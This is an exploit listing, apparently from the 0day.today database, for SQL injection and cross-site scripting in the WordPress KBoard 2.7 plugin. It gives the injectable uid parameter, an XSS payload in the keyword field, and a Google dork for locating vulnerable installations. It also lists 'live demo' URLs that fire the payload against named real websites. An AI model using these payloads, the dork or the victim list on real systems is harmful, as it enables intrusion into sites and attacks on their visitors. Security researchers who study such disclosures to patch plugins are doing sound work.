WordPress KBoard 2.7 Plugin - SQL Injection Vulnerability

2016-10-01T00:00:00
ID 1337DAY-ID-25099
Type zdt
Reporter Mojtaba MobhaM
Modified 2016-10-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################
# Exploit Title : WordPress Plugin KBoard 2.7 - SQL Injection
# Exploit Author : Persian Hack Team
# Homepage : http://persian-team.ir
# Google Dork : intitle:"KBoard 2.7"
# Vendor Homepage : http://www.cosmosfarm.com/products/kboard
# Category [ Webapps ]
# Tested on [ Win ]
# Version : 2.7
# Date 2016/09/26
######################
#
# PoC
# => Sql Injection :
# uid Parameter Vulnerable To SQL
# Demo :
# http://www.site.com/wp-content/plugins/kboard/board.php?pageid=1&board_id=1&mod=document&uid=[Inject Here]
# Video : http://persian-team.ir/showthread.php?tid=162

# Version : Before 4.4
######################
#
# PoC
# =>Cross Site Scripting :
#
# Payload : 1" onmouseover=prompt("Persian") bad="
# Keyword Vulnerable To XSS
# Demo :
# http://www.site.com/wp-content/plugins/kboard/board.php?pageid=1&board_id=1&mod=list&target=&keyword=1" onmouseover=prompt("Persian") bad="
#
# Live Demo :
#
# http://www.vocalcoachjoe.com/wp-content/plugins/kboard/board.php?pageid=1&board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22
#
# http://www.dbvalley.com/wp-content/plugins/kboard/board.php?board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22
#
# http://www.shinhan.ca/wp-content/plugins/kboard/board.php?board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22
#
# http://www.dhcmooncake.com/wp-content/plugins/kboard/board.php?board_id=2&pageid=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22
#
######################
# Discovered by : FireKernel & T3NZOG4N & Mojtaba MobhaM

#  0day.today [2018-01-04]  #